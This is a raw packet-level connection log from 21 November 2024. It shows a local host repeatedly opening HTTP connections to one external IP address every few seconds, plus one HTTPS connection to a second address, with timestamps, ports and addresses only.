Nov 21, 2024 22:18:17.894913912 CET	50141	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:17.895167112 CET	50142	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:18.014699936 CET	80	50142	185.215.113.43	192.168.2.5
Nov 21, 2024 22:18:19.233886957 CET	80	50142	185.215.113.43	192.168.2.5
Nov 21, 2024 22:18:19.233968019 CET	50142	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:20.854386091 CET	50142	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:20.854388952 CET	50143	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:20.974153042 CET	80	50143	185.215.113.43	192.168.2.5
Nov 21, 2024 22:18:20.974478960 CET	80	50142	185.215.113.43	192.168.2.5
Nov 21, 2024 22:18:20.975600004 CET	50143	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:20.975697994 CET	50142	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:20.975855112 CET	50143	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:21.095551014 CET	80	50143	185.215.113.43	192.168.2.5
Nov 21, 2024 22:18:22.396718025 CET	80	50143	185.215.113.43	192.168.2.5
Nov 21, 2024 22:18:22.396812916 CET	50143	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:23.902448893 CET	50143	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:23.902849913 CET	50144	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:24.022579908 CET	80	50144	185.215.113.43	192.168.2.5
Nov 21, 2024 22:18:24.022679090 CET	50144	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:24.022902012 CET	80	50143	185.215.113.43	192.168.2.5
Nov 21, 2024 22:18:24.022978067 CET	50143	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:24.023077011 CET	50144	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:24.144232035 CET	80	50144	185.215.113.43	192.168.2.5
Nov 21, 2024 22:18:25.505191088 CET	80	50144	185.215.113.43	192.168.2.5
Nov 21, 2024 22:18:25.505624056 CET	50144	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:27.136100054 CET	50144	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:27.136104107 CET	50145	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:27.255872965 CET	80	50145	185.215.113.43	192.168.2.5
Nov 21, 2024 22:18:27.255992889 CET	50145	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:27.256191015 CET	80	50144	185.215.113.43	192.168.2.5
Nov 21, 2024 22:18:27.256438017 CET	50145	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:27.256472111 CET	50144	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:27.375912905 CET	80	50145	185.215.113.43	192.168.2.5
Nov 21, 2024 22:18:28.654191017 CET	80	50145	185.215.113.43	192.168.2.5
Nov 21, 2024 22:18:28.657704115 CET	50145	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:30.168281078 CET	50145	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:30.168693066 CET	50146	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:30.288496017 CET	80	50146	185.215.113.43	192.168.2.5
Nov 21, 2024 22:18:30.288568974 CET	50146	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:30.288851023 CET	50146	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:30.288906097 CET	80	50145	185.215.113.43	192.168.2.5
Nov 21, 2024 22:18:30.288957119 CET	50145	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:30.408896923 CET	80	50146	185.215.113.43	192.168.2.5
Nov 21, 2024 22:18:31.674215078 CET	80	50146	185.215.113.43	192.168.2.5
Nov 21, 2024 22:18:31.674279928 CET	50146	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:35.746709108 CET	50146	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:35.747055054 CET	50148	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:35.866719007 CET	80	50146	185.215.113.43	192.168.2.5
Nov 21, 2024 22:18:35.866755009 CET	80	50148	185.215.113.43	192.168.2.5
Nov 21, 2024 22:18:35.866811037 CET	50146	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:35.866859913 CET	50148	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:35.867182970 CET	50148	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:35.986715078 CET	80	50148	185.215.113.43	192.168.2.5
Nov 21, 2024 22:18:37.261198044 CET	80	50148	185.215.113.43	192.168.2.5
Nov 21, 2024 22:18:37.261656046 CET	50148	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:38.887101889 CET	50148	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:38.887104034 CET	50149	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:39.006776094 CET	80	50149	185.215.113.43	192.168.2.5
Nov 21, 2024 22:18:39.006900072 CET	50149	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:39.007132053 CET	80	50148	185.215.113.43	192.168.2.5
Nov 21, 2024 22:18:39.007327080 CET	50149	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:39.007442951 CET	50148	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:39.127545118 CET	80	50149	185.215.113.43	192.168.2.5
Nov 21, 2024 22:18:40.385231972 CET	80	50149	185.215.113.43	192.168.2.5
Nov 21, 2024 22:18:40.385312080 CET	50149	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:41.903239012 CET	50149	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:41.903740883 CET	50150	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:42.023216009 CET	80	50149	185.215.113.43	192.168.2.5
Nov 21, 2024 22:18:42.023302078 CET	50149	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:42.023437977 CET	80	50150	185.215.113.43	192.168.2.5
Nov 21, 2024 22:18:42.023530960 CET	50150	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:42.024131060 CET	50150	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:42.143642902 CET	80	50150	185.215.113.43	192.168.2.5
Nov 21, 2024 22:18:43.361336946 CET	80	50150	185.215.113.43	192.168.2.5
Nov 21, 2024 22:18:43.361464977 CET	50150	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:44.995470047 CET	50150	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:44.995857000 CET	50151	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:45.115494013 CET	80	50151	185.215.113.43	192.168.2.5
Nov 21, 2024 22:18:45.115559101 CET	80	50150	185.215.113.43	192.168.2.5
Nov 21, 2024 22:18:45.115597963 CET	50151	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:45.115942955 CET	50150	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:45.116002083 CET	50151	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:45.235563040 CET	80	50151	185.215.113.43	192.168.2.5
Nov 21, 2024 22:18:46.183362961 CET	50152	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:18:46.183423996 CET	443	50152	149.154.167.220	192.168.2.5
Nov 21, 2024 22:18:46.183496952 CET	50152	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:18:46.189765930 CET	50152	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:18:46.189781904 CET	443	50152	149.154.167.220	192.168.2.5
Nov 21, 2024 22:18:46.556965113 CET	80	50151	185.215.113.43	192.168.2.5
Nov 21, 2024 22:18:46.557032108 CET	50151	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:47.602557898 CET	443	50152	149.154.167.220	192.168.2.5
Nov 21, 2024 22:18:47.602685928 CET	50152	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:18:47.605581999 CET	50152	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:18:47.605600119 CET	443	50152	149.154.167.220	192.168.2.5
Nov 21, 2024 22:18:47.605933905 CET	443	50152	149.154.167.220	192.168.2.5
Nov 21, 2024 22:18:47.627199888 CET	50152	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:18:47.667378902 CET	443	50152	149.154.167.220	192.168.2.5
Nov 21, 2024 22:18:48.074115992 CET	50151	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:48.074485064 CET	50153	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:48.194118023 CET	80	50151	185.215.113.43	192.168.2.5
Nov 21, 2024 22:18:48.194190979 CET	80	50153	185.215.113.43	192.168.2.5
Nov 21, 2024 22:18:48.194199085 CET	50151	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:48.194277048 CET	50153	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:48.194555044 CET	50153	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:48.253859997 CET	443	50152	149.154.167.220	192.168.2.5
Nov 21, 2024 22:18:48.254053116 CET	443	50152	149.154.167.220	192.168.2.5
Nov 21, 2024 22:18:48.254122019 CET	50152	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:18:48.284631968 CET	50152	443	192.168.2.5	149.154.167.220
Nov 21, 2024 22:18:48.315285921 CET	80	50153	185.215.113.43	192.168.2.5
Nov 21, 2024 22:18:49.587250948 CET	80	50153	185.215.113.43	192.168.2.5
Nov 21, 2024 22:18:49.587409019 CET	50153	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:51.214720011 CET	50153	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:51.215025902 CET	50154	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:51.334692001 CET	80	50154	185.215.113.43	192.168.2.5
Nov 21, 2024 22:18:51.334857941 CET	50154	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:51.334865093 CET	80	50153	185.215.113.43	192.168.2.5
Nov 21, 2024 22:18:51.335218906 CET	50153	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:51.335454941 CET	50154	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:51.455073118 CET	80	50154	185.215.113.43	192.168.2.5
Nov 21, 2024 22:18:52.674668074 CET	80	50154	185.215.113.43	192.168.2.5
Nov 21, 2024 22:18:52.677886009 CET	50154	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:54.183557034 CET	50154	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:54.183907032 CET	50156	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:54.304661036 CET	80	50156	185.215.113.43	192.168.2.5
Nov 21, 2024 22:18:54.304783106 CET	80	50154	185.215.113.43	192.168.2.5
Nov 21, 2024 22:18:54.304807901 CET	50156	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:54.304835081 CET	50154	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:54.305783987 CET	50156	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:54.426745892 CET	80	50156	185.215.113.43	192.168.2.5
Nov 21, 2024 22:18:55.640656948 CET	80	50156	185.215.113.43	192.168.2.5
Nov 21, 2024 22:18:55.640786886 CET	50156	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:57.262370110 CET	50156	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:57.262666941 CET	50157	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:57.383151054 CET	80	50156	185.215.113.43	192.168.2.5
Nov 21, 2024 22:18:57.383249998 CET	80	50157	185.215.113.43	192.168.2.5
Nov 21, 2024 22:18:57.383457899 CET	50156	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:57.383527040 CET	50157	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:57.383908987 CET	50157	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:57.503470898 CET	80	50157	185.215.113.43	192.168.2.5
Nov 21, 2024 22:18:58.767621040 CET	80	50157	185.215.113.43	192.168.2.5
Nov 21, 2024 22:18:58.770484924 CET	50157	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:00.280164003 CET	50157	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:00.280633926 CET	50158	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:00.400527954 CET	80	50158	185.215.113.43	192.168.2.5
Nov 21, 2024 22:19:00.400574923 CET	80	50157	185.215.113.43	192.168.2.5
Nov 21, 2024 22:19:00.400613070 CET	50158	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:00.400640011 CET	50157	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:00.401072979 CET	50158	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:00.520589113 CET	80	50158	185.215.113.43	192.168.2.5
Nov 21, 2024 22:19:01.783226967 CET	80	50158	185.215.113.43	192.168.2.5
Nov 21, 2024 22:19:01.783319950 CET	50158	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:03.401278019 CET	50158	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:03.401283026 CET	50159	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:03.521387100 CET	80	50159	185.215.113.43	192.168.2.5
Nov 21, 2024 22:19:03.521470070 CET	80	50158	185.215.113.43	192.168.2.5
Nov 21, 2024 22:19:03.521608114 CET	50159	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:03.521753073 CET	50158	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:03.521878958 CET	50159	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:03.641398907 CET	80	50159	185.215.113.43	192.168.2.5
Nov 21, 2024 22:19:04.909271955 CET	80	50159	185.215.113.43	192.168.2.5
Nov 21, 2024 22:19:04.909873962 CET	50159	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:06.418651104 CET	50159	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:06.419101000 CET	50160	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:06.539930105 CET	80	50160	185.215.113.43	192.168.2.5
Nov 21, 2024 22:19:06.540010929 CET	50160	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:06.540014029 CET	80	50159	185.215.113.43	192.168.2.5
Nov 21, 2024 22:19:06.540075064 CET	50159	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:06.553194046 CET	50160	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:06.672796965 CET	80	50160	185.215.113.43	192.168.2.5
Nov 21, 2024 22:19:07.923322916 CET	80	50160	185.215.113.43	192.168.2.5
Nov 21, 2024 22:19:07.923396111 CET	50160	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:09.541860104 CET	50160	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:09.542243004 CET	50161	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:09.661999941 CET	80	50160	185.215.113.43	192.168.2.5
Nov 21, 2024 22:19:09.662026882 CET	80	50161	185.215.113.43	192.168.2.5
Nov 21, 2024 22:19:09.662074089 CET	50160	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:09.662127018 CET	50161	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:09.662390947 CET	50161	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:09.781873941 CET	80	50161	185.215.113.43	192.168.2.5
Nov 21, 2024 22:19:11.043358088 CET	80	50161	185.215.113.43	192.168.2.5
Nov 21, 2024 22:19:11.043701887 CET	50161	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:12.563855886 CET	50161	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:12.564208984 CET	50162	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:12.683743000 CET	80	50162	185.215.113.43	192.168.2.5
Nov 21, 2024 22:19:12.684011936 CET	80	50161	185.215.113.43	192.168.2.5
Nov 21, 2024 22:19:12.686068058 CET	50161	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:12.686069012 CET	50162	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:12.686312914 CET	50162	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:12.805733919 CET	80	50162	185.215.113.43	192.168.2.5
Nov 21, 2024 22:19:14.072290897 CET	80	50162	185.215.113.43	192.168.2.5
Nov 21, 2024 22:19:14.072367907 CET	50162	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:15.698565960 CET	50162	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:15.698930979 CET	50163	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:15.819204092 CET	80	50162	185.215.113.43	192.168.2.5
Nov 21, 2024 22:19:15.819225073 CET	80	50163	185.215.113.43	192.168.2.5
Nov 21, 2024 22:19:15.819267988 CET	50162	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:15.819331884 CET	50163	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:15.819608927 CET	50163	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:15.939075947 CET	80	50163	185.215.113.43	192.168.2.5
Nov 21, 2024 22:19:17.199826956 CET	80	50163	185.215.113.43	192.168.2.5
Nov 21, 2024 22:19:17.203689098 CET	50163	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:18.714484930 CET	50163	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:18.714895964 CET	50164	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:18.834467888 CET	80	50164	185.215.113.43	192.168.2.5
Nov 21, 2024 22:19:18.834506035 CET	80	50163	185.215.113.43	192.168.2.5
Nov 21, 2024 22:19:18.835768938 CET	50164	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:18.835771084 CET	50163	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:18.839622974 CET	50164	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:18.959137917 CET	80	50164	185.215.113.43	192.168.2.5
Nov 21, 2024 22:19:20.217869043 CET	80	50164	185.215.113.43	192.168.2.5
Nov 21, 2024 22:19:20.217946053 CET	50164	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:21.839699984 CET	50164	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:21.839978933 CET	50165	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:21.961622000 CET	80	50165	185.215.113.43	192.168.2.5
Nov 21, 2024 22:19:21.961647987 CET	80	50164	185.215.113.43	192.168.2.5
Nov 21, 2024 22:19:21.961736917 CET	50165	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:21.961746931 CET	50164	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:21.962166071 CET	50165	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:22.081609964 CET	80	50165	185.215.113.43	192.168.2.5
Nov 21, 2024 22:19:23.306157112 CET	80	50165	185.215.113.43	192.168.2.5
Nov 21, 2024 22:19:23.306463957 CET	50165	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:24.823568106 CET	50165	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:24.823595047 CET	50166	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:24.944751978 CET	80	50166	185.215.113.43	192.168.2.5
Nov 21, 2024 22:19:24.944859982 CET	80	50165	185.215.113.43	192.168.2.5
Nov 21, 2024 22:19:24.944957972 CET	50165	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:24.945024014 CET	50166	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:24.945606947 CET	50166	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:25.065238953 CET	80	50166	185.215.113.43	192.168.2.5
Nov 21, 2024 22:19:26.386147022 CET	80	50166	185.215.113.43	192.168.2.5
Nov 21, 2024 22:19:26.386228085 CET	50166	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:28.012304068 CET	50166	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:28.012718916 CET	50167	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:28.132535934 CET	80	50166	185.215.113.43	192.168.2.5
Nov 21, 2024 22:19:28.132592916 CET	50166	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:28.132661104 CET	80	50167	185.215.113.43	192.168.2.5
Nov 21, 2024 22:19:28.132720947 CET	50167	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:28.132998943 CET	50167	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:28.252746105 CET	80	50167	185.215.113.43	192.168.2.5
Nov 21, 2024 22:19:29.517551899 CET	80	50167	185.215.113.43	192.168.2.5
Nov 21, 2024 22:19:29.519721985 CET	50167	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:31.027637959 CET	50167	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:31.027653933 CET	50168	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:31.297930002 CET	80	50168	185.215.113.43	192.168.2.5
Nov 21, 2024 22:19:31.298069000 CET	50168	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:31.298717022 CET	50168	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:31.304256916 CET	80	50167	185.215.113.43	192.168.2.5
Nov 21, 2024 22:19:31.307786942 CET	50167	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:31.418839931 CET	80	50168	185.215.113.43	192.168.2.5
Nov 21, 2024 22:19:32.684037924 CET	80	50168	185.215.113.43	192.168.2.5
Nov 21, 2024 22:19:32.684109926 CET	50168	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:34.293435097 CET	50168	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:34.293915033 CET	50169	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:34.413491011 CET	80	50169	185.215.113.43	192.168.2.5
Nov 21, 2024 22:19:34.413563967 CET	50169	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:34.413579941 CET	80	50168	185.215.113.43	192.168.2.5
Nov 21, 2024 22:19:34.413651943 CET	50168	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:34.413959980 CET	50169	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:34.533741951 CET	80	50169	185.215.113.43	192.168.2.5
Nov 21, 2024 22:19:35.790955067 CET	80	50169	185.215.113.43	192.168.2.5
Nov 21, 2024 22:19:35.791022062 CET	50169	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:37.309986115 CET	50169	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:37.309999943 CET	50170	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:37.430088043 CET	80	50170	185.215.113.43	192.168.2.5
Nov 21, 2024 22:19:37.430344105 CET	80	50169	185.215.113.43	192.168.2.5
Nov 21, 2024 22:19:37.435760021 CET	50169	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:37.435769081 CET	50170	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:37.436423063 CET	50170	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:37.556957006 CET	80	50170	185.215.113.43	192.168.2.5
Nov 21, 2024 22:19:38.838113070 CET	80	50170	185.215.113.43	192.168.2.5
Nov 21, 2024 22:19:38.839714050 CET	50170	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:40.464824915 CET	50170	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:40.465241909 CET	50172	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:40.584937096 CET	80	50170	185.215.113.43	192.168.2.5
Nov 21, 2024 22:19:40.585000992 CET	50170	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:40.585046053 CET	80	50172	185.215.113.43	192.168.2.5
Nov 21, 2024 22:19:40.585122108 CET	50172	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:40.585402012 CET	50172	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:40.705085039 CET	80	50172	185.215.113.43	192.168.2.5
Nov 21, 2024 22:19:41.932939053 CET	80	50172	185.215.113.43	192.168.2.5
Nov 21, 2024 22:19:41.933027029 CET	50172	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:43.447925091 CET	50172	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:43.451668978 CET	50173	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:43.568233967 CET	80	50172	185.215.113.43	192.168.2.5
Nov 21, 2024 22:19:43.568459034 CET	50172	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:43.571310043 CET	80	50173	185.215.113.43	192.168.2.5
Nov 21, 2024 22:19:43.571676970 CET	50173	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:43.572046995 CET	50173	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:43.691677094 CET	80	50173	185.215.113.43	192.168.2.5
Nov 21, 2024 22:19:44.999707937 CET	80	50173	185.215.113.43	192.168.2.5
Nov 21, 2024 22:19:44.999937057 CET	50173	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:46.621146917 CET	50173	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:46.621540070 CET	50174	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:46.741198063 CET	80	50173	185.215.113.43	192.168.2.5
Nov 21, 2024 22:19:46.741292000 CET	80	50174	185.215.113.43	192.168.2.5
Nov 21, 2024 22:19:46.741331100 CET	50173	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:46.741656065 CET	50174	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:46.741942883 CET	50174	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:46.861454010 CET	80	50174	185.215.113.43	192.168.2.5
Nov 21, 2024 22:19:48.081738949 CET	80	50174	185.215.113.43	192.168.2.5
Nov 21, 2024 22:19:48.081824064 CET	50174	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:49.589610100 CET	50174	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:49.589626074 CET	50175	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:49.709414005 CET	80	50175	185.215.113.43	192.168.2.5
Nov 21, 2024 22:19:49.709603071 CET	80	50174	185.215.113.43	192.168.2.5
Nov 21, 2024 22:19:49.709707022 CET	50174	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:49.709728956 CET	50175	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:49.709903955 CET	50175	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:49.830090046 CET	80	50175	185.215.113.43	192.168.2.5
Nov 21, 2024 22:19:51.091233015 CET	80	50175	185.215.113.43	192.168.2.5
Nov 21, 2024 22:19:51.095671892 CET	50175	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:52.715573072 CET	50175	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:52.715924978 CET	50177	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:52.835532904 CET	80	50177	185.215.113.43	192.168.2.5
Nov 21, 2024 22:19:52.835602999 CET	80	50175	185.215.113.43	192.168.2.5
Nov 21, 2024 22:19:52.835644960 CET	50177	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:52.835941076 CET	50175	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:52.835971117 CET	50177	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:52.955821991 CET	80	50177	185.215.113.43	192.168.2.5
Nov 21, 2024 22:19:54.176927090 CET	80	50177	185.215.113.43	192.168.2.5
Nov 21, 2024 22:19:54.176994085 CET	50177	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:54.727144957 CET	50177	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:54.847357035 CET	80	50177	185.215.113.43	192.168.2.5
Nov 21, 2024 22:19:54.851671934 CET	50177	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:55.683686972 CET	50178	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:55.803385973 CET	80	50178	185.215.113.43	192.168.2.5
Nov 21, 2024 22:19:55.803474903 CET	50178	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:55.803772926 CET	50178	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:55.923371077 CET	80	50178	185.215.113.43	192.168.2.5
Nov 21, 2024 22:19:57.232568979 CET	80	50178	185.215.113.43	192.168.2.5
Nov 21, 2024 22:19:57.232856035 CET	50178	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:58.838768005 CET	50178	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:58.839123011 CET	50180	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:58.958935976 CET	80	50178	185.215.113.43	192.168.2.5
Nov 21, 2024 22:19:58.958961010 CET	80	50180	185.215.113.43	192.168.2.5
Nov 21, 2024 22:19:58.959112883 CET	50178	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:58.959120989 CET	50180	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:58.959685087 CET	50180	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:19:59.079632998 CET	80	50180	185.215.113.43	192.168.2.5
Nov 21, 2024 22:20:00.313141108 CET	80	50180	185.215.113.43	192.168.2.5
